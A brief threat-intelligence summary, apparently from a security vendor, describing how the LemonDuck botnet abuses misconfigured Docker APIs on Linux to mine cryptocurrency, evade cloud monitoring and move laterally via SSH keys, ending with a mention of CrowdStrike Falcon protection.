LemonDuck, a notorious cryptomining botnet, is actively targeting Docker APIs on Linux systems to mine cryptocurrency, capitalizing on the recent boom in cryptocurrency prices and increased cloud adoption by enterprises. The campaign exploits misconfigured cloud instances to run malicious containers that download disguised scripts, such as “core.png” and “a.asp,” which establish cronjobs to initiate mining operations using XMRig. LemonDuck evades detection by disabling Alibaba Cloud's monitoring service and uses proxy pools to obscure the crypto wallet addresses. The botnet also employs lateral movement via SSH keys, differentiating its approach from other mining campaigns. CrowdStrike's Falcon platform provides runtime protection and employs machine learning models to mitigate such threats, ensuring real-time security for container environments.